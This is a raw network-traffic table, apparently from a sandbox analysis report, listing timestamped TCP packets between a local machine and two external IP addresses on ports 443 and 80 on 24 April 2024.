Apr 24, 2024 10:24:14.220511913 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.220532894 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.220571041 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.220576048 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.220585108 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.222878933 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.222897053 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.222949028 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.222955942 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.222963095 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.226980925 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.227001905 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.227042913 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.227050066 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.227089882 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.229002953 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.229022026 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.229078054 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.229083061 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.229111910 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.230825901 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.230846882 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.230880022 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.230884075 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.230907917 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.231074095 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.231498957 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.231518030 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.231554985 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.231560946 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.231573105 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.243122101 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.243143082 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.243179083 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.243184090 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.243196964 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.244153023 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.244169950 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.244206905 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.244225025 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.244237900 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.244937897 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.244961023 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.244998932 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.245013952 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.245024920 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.246777058 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.246793985 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.246833086 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.246855021 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.246869087 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.247402906 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.247423887 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.247452974 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.247473001 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.247486115 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.247869015 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.247895002 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.247920990 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.247930050 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.247945070 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.248821020 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.248842001 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.248872995 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.248891115 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.248900890 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.249372959 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.249389887 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.249424934 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.249439001 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.249449968 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.250050068 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.250080109 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.250114918 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.250130892 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.250144005 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.250926971 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.250943899 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.250978947 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.250996113 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.251008034 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.251524925 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.251544952 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.251571894 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.251584053 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.251595974 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.253108978 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.253127098 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.253164053 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.253184080 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.253196955 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.253504992 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.253526926 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.253552914 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.253562927 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.253573895 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.253973961 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.253992081 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.254031897 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.254041910 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.254053116 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.255245924 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.255266905 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.255299091 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.255316973 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.255328894 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.255997896 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.256016016 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.256047010 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.256059885 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.256072998 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.256568909 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.256623983 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.256624937 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.256635904 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.256669044 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.257282019 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.257302999 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.257335901 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.257344961 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.257358074 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.259881973 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.259906054 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.259942055 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.259958982 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.259974957 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.260344982 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.260365009 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.260397911 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.260411024 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.260421991 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.260752916 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.260790110 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.260804892 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.260813951 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.260842085 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.261209965 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.261229992 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.261256933 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.261264086 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.261276007 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.264652014 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.264677048 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.264714956 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.264734983 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.264758110 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.266926050 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.266947031 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.266985893 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.266999960 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.267011881 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.267011881 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.267071962 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.267096043 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.267112970 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.267117023 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.267141104 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.267195940 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.267230988 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.267251015 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.267276049 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.267278910 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.267297983 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.267318010 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.267342091 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.267410994 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.267416000 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.267491102 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.267510891 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.267533064 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.267538071 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.267549038 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.267566919 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.267607927 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.267611980 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.267637014 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.267782927 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.268732071 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.269572973 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:18.836990118 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.028038979 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.028124094 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.028256893 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.223023891 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.223052025 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.223066092 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.223107100 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.223120928 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.223165989 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.223196030 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.223213911 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.223268032 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.223320961 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.223356009 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.223406076 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.223452091 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.223472118 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.414813042 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.414916039 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.414928913 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.414932966 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.414943933 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.414958000 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.414973021 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.414983034 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.414990902 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.414994955 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.415004015 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.415024042 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.415066957 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.415080070 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.415092945 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.415108919 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.415150881 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.415164948 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.415177107 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.415188074 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.415201902 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.415227890 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.415241003 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.415263891 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.415271044 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.415277004 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.415308952 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.606061935 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.606087923 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.606163025 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.606211901 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.606229067 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.606268883 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.606309891 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.606353045 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.606394053 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.606429100 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.606503963 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.606542110 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.606601000 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.606667995 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.606687069 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.606708050 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.606760025 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.606796980 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.606833935 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.606863976 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.606900930 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.606909990 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.607000113 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.607040882 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.607069969 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.607146978 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.607186079 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.607206106 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.607275009 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.607311964 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.607450962 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.607516050 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.607551098 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.607554913 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.607609987 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.607647896 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.607686043 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.607741117 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.607786894 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.607820988 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.607851028 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.607888937 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.607932091 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.607948065 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.607979059 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.607996941 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.608036041 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.608072996 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.608171940 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.608251095 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.608290911 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.608302116 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.608351946 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.608390093 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.608505011 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.608546972 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.608582973 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.796652079 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.796686888 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.796705961 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.796725035 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.796742916 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.796768904 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.796809912 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.796827078 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.796900988 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.796940088 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.796945095 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.796983957 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.797022104 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.797058105 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.797135115 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.797175884 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.797228098 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.797286034 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.797324896 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.797454119 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.797542095 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.797580957 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.797611952 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.797703028 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.797727108 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.797744036 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.797827005 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.797846079 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.797868967 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.798003912 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.798043966 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.798063993 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.798101902 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.798139095 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.798242092 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.798336029 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.798377037 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.798398972 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.798474073 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.798511982 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.798544884 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.798564911 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.798604012 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.798618078 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.798656940 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.798696041 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.798717976 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.798800945 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.798840046 CEST	49165	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:19.798842907 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.798985004 CEST	80	49165	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:19.799007893 CEST	80	49165	192.210.214.26	192.168.2.22
